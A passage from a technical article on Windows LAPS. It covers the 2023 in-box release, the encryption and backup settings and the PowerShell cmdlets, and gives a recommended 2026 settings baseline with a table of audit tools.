&lt;p&gt;Microsoft fixed both of those structural defects on April 11, 2023. The fix shipped in the operating system, with no MSI. We come to it next.&lt;/p&gt;
&lt;h2&gt;6. The In-Box Era: Windows LAPS (April 11, 2023 to Present)&lt;/h2&gt;
&lt;p&gt;Patch Tuesday, April 11, 2023. The April cumulative update for Windows 11 22H2 was KB5025239. The Windows 11 21H2 update was KB5025224. Windows 10 22H2 was KB5025221. Windows Server 2022 was KB5025230. Windows Server 2019 was KB5025229. The Server Annual Channel shipped it too. Windows Server 2016 was, and remains, explicitly excluded -- the per-SKU April-2023 cumulative-update KB numbers are catalogued in the Tenable retrospective on the Windows LAPS GA wave [@tc-windows-laps-ga-2023] and the official Microsoft LAPS overview page [@ms-laps-overview]. The MSI was gone. The &lt;code&gt;admpwd.dll&lt;/code&gt; Client-Side Extension was gone. In its place: &lt;strong&gt;exactly three&lt;/strong&gt; OS binaries -- &lt;code&gt;laps.dll&lt;/code&gt; for core LAPS logic, &lt;code&gt;lapscsp.dll&lt;/code&gt; for the Microsoft Intune Configuration Service Provider, and &lt;code&gt;lapspsh.dll&lt;/code&gt; for the &lt;code&gt;LAPS&lt;/code&gt; PowerShell module -- all shipped together, all part of the OS, all available without installing anything [@ms-laps-concepts-overview; @tc-windows-laps-ga-2023]. The Microsoft Learn &lt;code&gt;laps-concepts-overview&lt;/code&gt; page enumerates the three binaries verbatim and lists no fourth.&lt;/p&gt;
&lt;p&gt;The most consequential architectural change is the one most often missed.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The legacy &lt;code&gt;admpwd.dll&lt;/code&gt; was a Group Policy CSE; its rotation cycle was driven by the GP refresh interval (90 minutes plus jitter on member computers). The new &lt;code&gt;laps.dll&lt;/code&gt; is &lt;em&gt;not&lt;/em&gt; a CSE. It runs on a hard-coded in-process background timer of approximately one hour inside &lt;code&gt;laps.dll&lt;/code&gt; itself -- &lt;strong&gt;not&lt;/strong&gt; a Windows Task Scheduler task, and not configurable. The cited Microsoft Learn page is unambiguous: &lt;em&gt;&quot;Windows LAPS uses a background task that wakes up every hour to process the currently active policy. This task isn&apos;t implemented with a Windows Task Scheduler task and isn&apos;t configurable.&quot;&lt;/em&gt; The polling cycle is decoupled from the Group Policy refresh cycle entirely [@ms-laps-concepts-overview]. The implications: the rotation cadence is not configurable below one hour; reducing the GP refresh interval does not accelerate LAPS rotation; the Task Scheduler library will not show a LAPS task because there isn&apos;t one; and Windows LAPS will rotate a password on an off-network domain-joined machine the moment it re-establishes line-of-sight to a Domain Controller, regardless of whether a GP refresh has fired.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The new schema added six attributes to the &lt;code&gt;Computer&lt;/code&gt; object: &lt;code&gt;msLAPS-Password&lt;/code&gt; (the plaintext-fallback location), &lt;code&gt;msLAPS-EncryptedPassword&lt;/code&gt; (the CNG-DPAPI-wrapped ciphertext blob), &lt;code&gt;msLAPS-EncryptedPasswordHistory&lt;/code&gt; (rotation history), &lt;code&gt;msLAPS-PasswordExpirationTime&lt;/code&gt;, &lt;code&gt;msLAPS-EncryptedDSRMPassword&lt;/code&gt; (Directory Services Restore Mode account on a DC), and &lt;code&gt;msLAPS-EncryptedDSRMPasswordHistory&lt;/code&gt; [@ms-laps-concepts-overview]. The DSRM pair is a Windows-LAPS-only capability; legacy LAPS never covered Domain Controller DSRM accounts. The schema extension is performed once per forest by &lt;code&gt;Update-LapsADSchema&lt;/code&gt;, which is idempotent and coexists with the legacy &lt;code&gt;ms-Mcs-AdmPwd&lt;/code&gt; attribute [@ms-laps-mig-scenarios].&lt;/p&gt;
&lt;p&gt;A seventh attribute, &lt;code&gt;msLAPS-CurrentPasswordVersion&lt;/code&gt;, exists in the &lt;strong&gt;Windows Server 2025 forest schema&lt;/strong&gt; only. It is added automatically when the first Windows Server 2025 Domain Controller is promoted -- &lt;em&gt;not&lt;/em&gt; by running &lt;code&gt;Update-LapsADSchema&lt;/code&gt; -- and is used by &lt;code&gt;laps.dll&lt;/code&gt; to mitigate a virtual-machine-snapshot torn-state class. The attribute is read-only as far as the LAPS feature is concerned and is not part of the &lt;code&gt;ReadLAPSPassword&lt;/code&gt; BloodHound edge&apos;s calculus [@ms-laps-concepts-overview].&lt;/p&gt;
&lt;h3&gt;Encryption-at-rest with CNG DPAPI&lt;/h3&gt;
&lt;p&gt;The load-bearing addition is encryption of the password &lt;em&gt;before&lt;/em&gt; it leaves the client. The mechanism is the &lt;strong&gt;CNG DPAPI&lt;/strong&gt; group key-protector (still commonly called DPAPI-NG in Microsoft&apos;s older documentation) [@ms-cng-dpapi]. The client generates the new local-Administrator password, then wraps the plaintext against a security principal SID using the Active Directory Key Distribution Service (KDS) root key infrastructure. The wrapped blob is the only thing the LDAP write places into &lt;code&gt;msLAPS-EncryptedPassword&lt;/code&gt;. To decrypt, a reader Kerberos-authenticates to the KDC; only members of the configured principal group at decryption time can derive the protector. The directory itself never sees plaintext, and a stolen &lt;code&gt;NTDS.dit&lt;/code&gt; yields ciphertext only [@ms-laps-concepts-overview].&lt;/p&gt;

A protection mechanism in Windows&apos;s CNG (Cryptography API: Next Generation) Data Protection API in which a payload is encrypted against a security principal -- typically an AD group SID -- rather than against a local user. Decryption is gated by Kerberos authentication and the principal&apos;s group membership at the time of decryption [@ms-cng-dpapi]. Microsoft Learn currently spells the primitive *&quot;CNG DPAPI&quot;* on the canonical reference; older Microsoft documentation and Win32 references continue to use the shorthand *&quot;DPAPI-NG&quot;*. They are the same primitive.
&lt;p&gt;There are two policy settings that gate the encryption path, and the failure modes are operationally important.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Microsoft Learn&apos;s &lt;code&gt;laps-management-policy-settings&lt;/code&gt; page lists &lt;code&gt;ADPasswordEncryptionEnabled&lt;/code&gt; with a default of &lt;strong&gt;True&lt;/strong&gt; [@ms-laps-policy-settings]. The genuine failure mode is &lt;em&gt;not&lt;/em&gt; an unset default; it is silent fallback to plaintext in &lt;code&gt;msLAPS-Password&lt;/code&gt; when (a) the forest&apos;s Domain Functional Level is below Windows Server 2016, or (b) the &lt;code&gt;BackupDirectory&lt;/code&gt; value is not &lt;code&gt;2&lt;/code&gt; (AD). Configure the policy &lt;em&gt;explicitly&lt;/em&gt; anyway: the explicit configuration makes the choice visible to policy audits and forces the operator to verify the DFL prerequisite. Do not flip a bit that is already True; do verify the prerequisites that make True work.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; When &lt;code&gt;ADPasswordEncryptionPrincipal&lt;/code&gt; is unspecified, Windows LAPS wraps the password against the &lt;em&gt;Domain Admins&lt;/em&gt; group of the computer&apos;s domain [@ms-laps-concepts-overview; @ms-laps-policy-settings]. Most fleets do not want every Domain Admin to be a routine LAPS reader. Configure a dedicated, audited, minimum-membership decryption group (a common naming convention is &lt;code&gt;LAPS-DPAPI-Decryptors&lt;/code&gt;) and assign it explicitly. Decryption authority is delegated separately from LDAP read authority; minimising membership of the decryption group is the single most useful hardening lever on a Windows LAPS deployment.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;The backup-directory choice&lt;/h3&gt;

The CSP / GPO node `BackupDirectory` selects where Windows LAPS writes the rotated password. The three valid values are **0** (do not back up; passwords rotate locally but are not retrievable), **1** (Microsoft Entra ID via the `deviceLocalCredentials` resource on Microsoft Graph), and **2** (Active Directory via the `msLAPS-*` attribute set). The values are mutually exclusive per device; a hybrid-joined device can choose either backend but not both [@ms-laps-policy-settings; @ms-laps-entra-scenarios].
&lt;p&gt;The Entra-backup path went generally available on October 23, 2023 [@tc-entra-laps-ga-2023]. With &lt;code&gt;BackupDirectory = 1&lt;/code&gt;, the local LAPS component posts the rotated password to the &lt;code&gt;deviceLocalCredentials&lt;/code&gt; resource on the device object in Microsoft Entra ID via the Microsoft Graph API [@ms-graph-localcredinfo]. Retrieval is via &lt;code&gt;Get-LapsAADPassword&lt;/code&gt; (a thin wrapper over the Graph endpoint), the Entra portal Devices blade, or a direct &lt;code&gt;GET /directory/deviceLocalCredentials/{deviceId}&lt;/code&gt; call [@ms-laps-entra-scenarios].&lt;/p&gt;
&lt;p&gt;The Entra-backup path has a &lt;strong&gt;seven-day minimum&lt;/strong&gt; for &lt;code&gt;PasswordAgeDays&lt;/code&gt;. The AD-backup path&apos;s minimum is one day. A tier-0 fleet that targets daily rotation on Entra-joined endpoints will not get daily rotation -- Entra-side policy validation rejects the value. Section 7&apos;s baseline table reflects this asymmetry.&lt;/p&gt;
&lt;h3&gt;Policy surface and the FQ-anchored corrections&lt;/h3&gt;
&lt;p&gt;Windows LAPS is configurable via Group Policy (for AD-joined hosts), the LAPS Configuration Service Provider at &lt;code&gt;./Device/Vendor/MSFT/LAPS/Policies/*&lt;/code&gt; for Intune-managed hosts [@ms-laps-csp], local policy, or the legacy LAPS GPO if &lt;code&gt;PolicySourceMode&lt;/code&gt; selects emulation mode. The settings include &lt;code&gt;BackupDirectory&lt;/code&gt;, &lt;code&gt;PasswordComplexity&lt;/code&gt; (values 1 through 8), &lt;code&gt;PasswordLength&lt;/code&gt;, &lt;code&gt;PasswordAgeDays&lt;/code&gt;, &lt;code&gt;PostAuthenticationActions&lt;/code&gt;, &lt;code&gt;PostAuthenticationResetDelay&lt;/code&gt;, &lt;code&gt;AdministratorAccountName&lt;/code&gt;, &lt;code&gt;PassphraseLength&lt;/code&gt;, &lt;code&gt;ADPasswordEncryptionEnabled&lt;/code&gt;, &lt;code&gt;ADPasswordEncryptionPrincipal&lt;/code&gt;, and &lt;code&gt;ADBackupDSRMPassword&lt;/code&gt;. On Windows 11 24H2 and Windows Server 2025 and later, the policy surface adds Automatic Account Management settings: &lt;code&gt;AutomaticAccountManagementEnabled&lt;/code&gt;, &lt;code&gt;AutomaticAccountManagementNameOrPrefix&lt;/code&gt;, &lt;code&gt;AutomaticAccountManagementRandomizeName&lt;/code&gt;, &lt;code&gt;AutomaticAccountManagementTarget&lt;/code&gt;, and &lt;code&gt;AutomaticAccountManagementEnableAccount&lt;/code&gt; [@ms-laps-policy-settings; @ms-laps-account-modes].&lt;/p&gt;

The action Windows LAPS performs after the managed account has authenticated to the host. Valid values are **1** (reset the password), **3** (reset and sign out the interactive session; default), **5** (reset and reboot, with a one-minute reboot delay), and **11** (reset, sign out, and terminate remaining processes; Windows 11 24H2 / Windows Server 2025 and later). The action fires after `PostAuthenticationResetDelay` hours have elapsed since the authentication that triggered it [@ms-laps-policy-settings].
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; A widespread misreading of the older Microsoft documentation lists &lt;code&gt;PostAuthenticationActions&lt;/code&gt; as a 1-2-3 enum. The correct enumeration per the current Microsoft Learn reference [@ms-laps-policy-settings] is &lt;strong&gt;1&lt;/strong&gt; (reset password), &lt;strong&gt;3&lt;/strong&gt; (reset + sign out; &lt;em&gt;default&lt;/em&gt;), &lt;strong&gt;5&lt;/strong&gt; (reset + reboot), and &lt;strong&gt;11&lt;/strong&gt; (reset + sign out + terminate remaining processes; Win 11 24H2 / Server 2025+). Value &lt;strong&gt;11&lt;/strong&gt; is &lt;em&gt;not&lt;/em&gt; &quot;force shutdown without warning&quot;; interactive users receive the same non-configurable two-minute warning as on value 3, and remaining processes are terminated after the warning expires. SMB sessions on the host are deleted on values 3 and 11.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;code&gt;PostAuthenticationResetDelay&lt;/code&gt; defaults to &lt;strong&gt;24 hours&lt;/strong&gt;. The range is 0 to 24 hours; a value of 0 disables the post-authentication action entirely [@ms-laps-policy-settings]. A tier-0 fleet aiming to close the screenshotted-password OPSEC tail aggressively will configure this down to 1 hour; tier-2 deployments typically leave it at 8 or 24.&lt;/p&gt;
&lt;h3&gt;PasswordComplexity values 5 through 8 (Windows 11 24H2+ / Windows Server 2025+)&lt;/h3&gt;
&lt;p&gt;&lt;code&gt;PasswordComplexity&lt;/code&gt; values &lt;strong&gt;1 through 4&lt;/strong&gt; are character-class modes (uppercase only; uppercase plus lowercase; uppercase plus lowercase plus numbers; and -- value 4, the default -- all four character classes). Value &lt;strong&gt;5&lt;/strong&gt; is &lt;em&gt;not&lt;/em&gt; a &quot;no vowels or numbers&quot; mode, despite a common folk attribution; it is the &lt;strong&gt;&quot;improved readability&quot; four-class variant&lt;/strong&gt; of value 4, equivalent to value 4 with the visually ambiguous glyphs &lt;code&gt;I&lt;/code&gt;, &lt;code&gt;O&lt;/code&gt;, &lt;code&gt;Q&lt;/code&gt;, &lt;code&gt;l&lt;/code&gt;, &lt;code&gt;o&lt;/code&gt;, &lt;code&gt;0&lt;/code&gt;, &lt;code&gt;1&lt;/code&gt; removed and the symbols &lt;code&gt;:&lt;/code&gt;, &lt;code&gt;=&lt;/code&gt;, &lt;code&gt;?&lt;/code&gt;, &lt;code&gt;*&lt;/code&gt; added [@ms-laps-passwords-passphrases]. Microsoft&apos;s own documented example password for value 5 is &lt;code&gt;vnJ!!?MTb5=U7Y&lt;/code&gt; -- which retains vowels and digits 2 through 9. Values &lt;strong&gt;6, 7, and 8&lt;/strong&gt; are passphrase modes drawn from a Microsoft-curated wordlist derived from the EFF Diceware wordlists [@eff-dice; @eff-wordlists-2016] with internal modifications. The published word counts after Microsoft&apos;s curation are &lt;strong&gt;7776 / 1276 / 1276&lt;/strong&gt; for modes 6 / 7 / 8 respectively; the EFF originals (the EFF Long Wordlist, EFF Short Wordlist #1, and EFF Short Wordlist #2 published July 2016) are &lt;strong&gt;7776 / 1296 / 1296&lt;/strong&gt; [@eff-dice; @eff-wordlists-2016]. &lt;strong&gt;Values 5 through 8 are all gated on Windows 11 24H2 / Windows Server 2025 and later&lt;/strong&gt; -- not only values 6-8. The cited Microsoft Learn page reads verbatim for value 5: &lt;em&gt;&quot;The PasswordComplexity setting of &apos;5&apos; is only supported in Windows 11 24H2, Windows Server 2025, and later releases.&quot;&lt;/em&gt; [@ms-laps-passwords-passphrases]. Passphrase modes exist for DSRM-account scenarios where the password must be typed by a human under duress; the article&apos;s section 7 baseline recommends them for tier-0 break-glass accounts.&lt;/p&gt;
&lt;h3&gt;PowerShell surface and one important cmdlet name&lt;/h3&gt;
&lt;p&gt;The native &lt;code&gt;LAPS&lt;/code&gt; PowerShell module ships eight cmdlets the article calls out by name: &lt;code&gt;Get-LapsADPassword&lt;/code&gt;, &lt;code&gt;Reset-LapsPassword&lt;/code&gt;, &lt;code&gt;Update-LapsADSchema&lt;/code&gt;, &lt;code&gt;Set-LapsADAuditing&lt;/code&gt;, &lt;code&gt;Set-LapsADComputerSelfPermission&lt;/code&gt;, &lt;code&gt;Set-LapsADReadPasswordPermission&lt;/code&gt;, &lt;code&gt;Set-LapsADResetPasswordPermission&lt;/code&gt;, and &lt;code&gt;Find-LapsADExtendedRights&lt;/code&gt; [@ms-laps-ps-overview; @ms-laps-get-adpassword]. The auditing cmdlet is &lt;code&gt;Set-LapsADAuditing&lt;/code&gt; -- &lt;em&gt;not&lt;/em&gt; &lt;code&gt;Set-LapsADAuditingSettings&lt;/code&gt;, which does not exist as a cmdlet name [@ms-laps-set-adauditing]. The Entra-backup retrieval cmdlet is &lt;code&gt;Get-LapsAADPassword&lt;/code&gt;, a wrapper around Microsoft Graph.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; A common copy-paste error in deployment runbooks is to write &lt;code&gt;Set-LapsADAuditingSettings&lt;/code&gt;. The cmdlet name is &lt;code&gt;Set-LapsADAuditing&lt;/code&gt; [@ms-laps-set-adauditing], and the cmdlet emits Directory Service audit event 4662 on configured attribute reads. The SACL it installs targets the LAPS attribute set; you still need the host-side Audit Directory Service Access subcategory enabled on Domain Controllers for the event to land in the Security log.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;Migration coexistence&lt;/h3&gt;
&lt;p&gt;Legacy LAPS and Windows LAPS can coexist on the same host only if they target &lt;em&gt;different&lt;/em&gt; local accounts. The documented coexistence pattern is to run legacy LAPS against the built-in RID 500 Administrator while introducing Windows LAPS against a named secondary local-admin account, then retire the legacy MSI once Windows LAPS coverage is verified [@ms-laps-mig-scenarios]. The cross-pointer in section 11 details the seven-step migration sequence.&lt;/p&gt;

flowchart TD
    Tick[&quot;laps.dll background timer (~1 hr)&quot;]
    ReadPolicy[&quot;Read effective policy&lt;br /&gt;CSP &amp;gt; GPO &amp;gt; local &amp;gt; legacy emulation&quot;]
    BackupDir{&quot;BackupDirectory&lt;br /&gt;1 (Entra) / 2 (AD) / 0?&quot;}
    EntraPath[&quot;Write to Graph deviceLocalCredentials&lt;br /&gt;(min PasswordAgeDays = 7)&quot;]
    ADPath[&quot;Write to msLAPS-* attribute set&lt;br /&gt;(min PasswordAgeDays = 1)&quot;]
    EncryptionGate{&quot;ADPasswordEncryptionEnabled = True&lt;br /&gt;AND DFL ≥ Server 2016?&quot;}
    Encrypted[&quot;msLAPS-EncryptedPassword&lt;br /&gt;(DPAPI-NG, principal = ADPasswordEncryptionPrincipal)&quot;]
    Plaintext[&quot;msLAPS-Password (plaintext fallback)&quot;]
    SetSAM[&quot;Set SAM password on&lt;br /&gt;AdministratorAccountName (empty = RID 500)&quot;]
    Auth[&quot;Managed account authenticates&quot;]
    PAA{&quot;PostAuthenticationActions&lt;br /&gt;0 / 1 / 3 / 5 / 11?&quot;}
    Wait[&quot;Wait PostAuthenticationResetDelay (default 24 h)&quot;]
    Action1[&quot;1: reset password&quot;]
    Action3[&quot;3: reset + sign out, 2-min warning, DEFAULT&quot;]
    Action5[&quot;5: reset + reboot, 1-min delay&quot;]
    Action11[&quot;11: reset + sign out + terminate procs (24H2 / WS2025+)&quot;]
    Tick --&amp;gt; ReadPolicy
    ReadPolicy --&amp;gt; BackupDir
    BackupDir -- 1 --&amp;gt; EntraPath
    BackupDir -- 2 --&amp;gt; EncryptionGate
    BackupDir -- 0 --&amp;gt; SetSAM
    EncryptionGate -- yes --&amp;gt; Encrypted
    EncryptionGate -- no --&amp;gt; Plaintext
    EntraPath --&amp;gt; SetSAM
    Encrypted --&amp;gt; SetSAM
    Plaintext --&amp;gt; SetSAM
    SetSAM --&amp;gt; Auth
    Auth --&amp;gt; Wait
    Wait --&amp;gt; PAA
    PAA -- 1 --&amp;gt; Action1
    PAA -- 3 --&amp;gt; Action3
    PAA -- 5 --&amp;gt; Action5
    PAA -- 11 --&amp;gt; Action11
&lt;p&gt;With the in-box era settled, what does a 2026 deployment actually look like? A short list of policy settings, and a slightly longer list of footguns.&lt;/p&gt;
&lt;h2&gt;7. The 2026 Baseline as a Settings Table&lt;/h2&gt;
&lt;p&gt;Architecture is interesting. Audits are not. Here is the 2026 settings table that, in production, separates a deployment that meets its goal from one that quietly does not. Every row carries the policy node, the documented default, the recommended tier-2 value (a typical end-user fleet), the recommended tier-0 value (Domain Controllers and break-glass), and the citation. Cross-check the row against the Microsoft Learn policy-settings page before you ship it.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Policy&lt;/th&gt;
&lt;th&gt;Default&lt;/th&gt;
&lt;th&gt;Recommended (tier 2)&lt;/th&gt;
&lt;th&gt;Recommended (tier 0)&lt;/th&gt;
&lt;th&gt;Why&lt;/th&gt;
&lt;th&gt;Citation&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;&lt;code&gt;BackupDirectory&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;0&lt;/code&gt; (no backup)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;2&lt;/code&gt; (AD) for AD-joined and hybrid-joined; &lt;code&gt;1&lt;/code&gt; (Entra) for pure Entra-joined&lt;/td&gt;
&lt;td&gt;same as tier 2&lt;/td&gt;
&lt;td&gt;One directory per device; AD for hybrid where on-prem identity is canonical&lt;/td&gt;
&lt;td&gt;[@ms-laps-policy-settings]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;PasswordComplexity&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;4&lt;/code&gt; (all character classes)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;4&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;6&lt;/code&gt; (3-word passphrase) for accounts a human must type under duress (DSRM / break-glass); &lt;code&gt;4&lt;/code&gt; for automated retrieval&lt;/td&gt;
&lt;td&gt;Passphrases for human typing; character-set for tool-only retrieval. Values &lt;strong&gt;5 through 8&lt;/strong&gt; are gated on Windows 11 24H2 / Windows Server 2025 and later: value 5 is the &quot;improved-readability&quot; four-class variant of 4 (not a &quot;no vowels&quot; mode); values 6/7/8 are passphrase modes with Microsoft-curated EFF-derived wordlists of 7776 / 1276 / 1276 entries (EFF originals: 7776 / 1296 / 1296)&lt;/td&gt;
&lt;td&gt;[@ms-laps-passwords-passphrases; @eff-dice; @eff-wordlists-2016]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;PasswordLength&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;14&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;24&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;24&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Eliminates the rainbow-table threat class&lt;/td&gt;
&lt;td&gt;[@ms-laps-passwords-passphrases]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;PasswordAgeDays&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;30&lt;/code&gt; (1-day minimum AD; 7-day minimum Entra; 365-day max)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;30&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;1&lt;/code&gt; (AD) / &lt;code&gt;7&lt;/code&gt; (Entra; lower fails policy validation)&lt;/td&gt;
&lt;td&gt;Caps the blast radius of an undetected credential theft to one rotation window&lt;/td&gt;
&lt;td&gt;[@ms-laps-policy-settings]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;PostAuthenticationActions&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;3&lt;/code&gt; (reset + sign out)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;3&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;3&lt;/code&gt;, or &lt;code&gt;11&lt;/code&gt; on Win 11 24H2+ if process termination is required&lt;/td&gt;
&lt;td&gt;Closes the screenshot-leak OPSEC tail on the next managed-account interactive logon. Value &lt;code&gt;11&lt;/code&gt; is &lt;em&gt;not&lt;/em&gt; &quot;force shutdown without warning&quot; -- it is reset + sign out + terminate remaining processes with the same two-minute warning as &lt;code&gt;3&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;[@ms-laps-policy-settings]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;PostAuthenticationResetDelay&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;24&lt;/code&gt; (hours)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;8&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;1&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Trade-off between operational task completion and exposure window&lt;/td&gt;
&lt;td&gt;[@ms-laps-policy-settings]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;ADPasswordEncryptionEnabled&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;True&lt;/code&gt; per Microsoft Learn&apos;s defaults table -- &lt;em&gt;not&lt;/em&gt; off-by-default&lt;/td&gt;
&lt;td&gt;&lt;code&gt;True&lt;/code&gt;, configured explicitly so the choice is visible in policy audits and the DFL prerequisite is verified&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;The genuine failure mode is silent fallback to plaintext when DFL is below Server 2016 or &lt;code&gt;BackupDirectory&lt;/code&gt; is not &lt;code&gt;2&lt;/code&gt;, &lt;em&gt;not&lt;/em&gt; a default-off bit&lt;/td&gt;
&lt;td&gt;[@ms-laps-policy-settings; @ms-laps-csp]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;ADPasswordEncryptionPrincipal&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;Domain Admins&lt;/code&gt; of the computer&apos;s domain when unspecified&lt;/td&gt;
&lt;td&gt;Dedicated &lt;code&gt;LAPS-DPAPI-Decryptors&lt;/code&gt; group, &lt;em&gt;not&lt;/em&gt; Domain Admins&lt;/td&gt;
&lt;td&gt;same, with PIM-gated activation&lt;/td&gt;
&lt;td&gt;Decryption authority is delegated separately from LDAP read; minimise membership&lt;/td&gt;
&lt;td&gt;[@ms-laps-concepts-overview]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;AdministratorAccountName&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;empty (manages built-in RID 500)&lt;/td&gt;
&lt;td&gt;empty on Server SKUs; named account (e.g. &lt;code&gt;lapsadmin&lt;/code&gt;) on Client SKUs with the built-in disabled&lt;/td&gt;
&lt;td&gt;On Win 11 24H2 / WS2025+, prefer Automatic Account Management with random name and disabled-by-default&lt;/td&gt;
&lt;td&gt;Defeats predictable-RID-500 enumeration&lt;/td&gt;
&lt;td&gt;[@ms-laps-policy-settings; @ms-laps-account-modes]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;ADBackupDSRMPassword&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;False&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;n/a (member servers)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;True&lt;/code&gt; on Domain Controllers&lt;/td&gt;
&lt;td&gt;Brings DSRM-account management into LAPS scope -- a capability legacy LAPS never had&lt;/td&gt;
&lt;td&gt;[@ms-laps-concepts-overview]&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;

Tier-0 deviations from the tier-2 baseline are narrow but consequential. (a) `PasswordAgeDays` to 1 (AD) or 7 (Entra) caps the undetected-theft window. (b) `PostAuthenticationResetDelay` to 1 hour aggressively rotates after legitimate use. (c) `ADPasswordEncryptionPrincipal` to a dedicated decryptor group with PIM-gated activation [@ms-entra-pim] -- not standing membership. (d) `ADBackupDSRMPassword = True` only on DCs, so the Directory Services Restore Mode account is in LAPS scope. (e) `PasswordComplexity = 6` on accounts that a human must type under duress (DSRM, ESAE break-glass), `4` everywhere else. The tier-0 baseline is more expensive operationally -- daily rotation and 1-hour post-auth delay create a non-trivial volume of password reads through the decryption group -- and the cost is the entire point. Anything cheaper does not warrant the tier-0 label.
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The single most useful hardening move on a Windows LAPS deployment is to explicitly set &lt;code&gt;ADPasswordEncryptionPrincipal&lt;/code&gt; to a dedicated group with minimum membership. Default = Domain Admins of the computer&apos;s domain is operationally correct (Domain Admins should be the readers of last resort) but architecturally lazy (most fleets do not want their DA group to be the routine LAPS-read group). Name the group something searchable -- &lt;code&gt;LAPS-DPAPI-Decryptors&lt;/code&gt; is a defensible convention -- and put helpdesk LAPS-read permissions in &lt;em&gt;that&lt;/em&gt; group, gated by Entra PIM activation [@ms-entra-pim] for non-emergency reads.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;The audit-primitives sub-table&lt;/h3&gt;
&lt;p&gt;The decision of which tool answers which question is, in practice, the difference between a LAPS deployment that meets its goal and one that quietly does not. The five (and a half) primitives:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Primitive&lt;/th&gt;
&lt;th&gt;Question it answers&lt;/th&gt;
&lt;th&gt;Primary source&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;BloodHound &lt;code&gt;ReadLAPSPassword&lt;/code&gt; edge&lt;/td&gt;
&lt;td&gt;Which principals can read the LAPS password on which computer objects, transitively across the graph?&lt;/td&gt;
&lt;td&gt;[@bloodhound-edge-readlaps]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;PingCastle &lt;code&gt;A-LAPS-Not-Installed&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Does this domain have any LAPS solution installed for the native local administrator account?&lt;/td&gt;
&lt;td&gt;[@pingcastle-rules]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;PingCastle &lt;code&gt;A-LAPS-Joined-Computers&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Can a user who manually domain-joined a computer (via &lt;code&gt;mS-DS-CreatorSID&lt;/code&gt; ownership) still read that computer&apos;s LAPS password?&lt;/td&gt;
&lt;td&gt;[@pingcastle-rules]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;PingCastle &lt;code&gt;A-PwdGPO&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Does this domain still have residual GPP &lt;code&gt;cpassword&lt;/code&gt; artefacts in SYSVOL? (MITRE T1552.006)&lt;/td&gt;
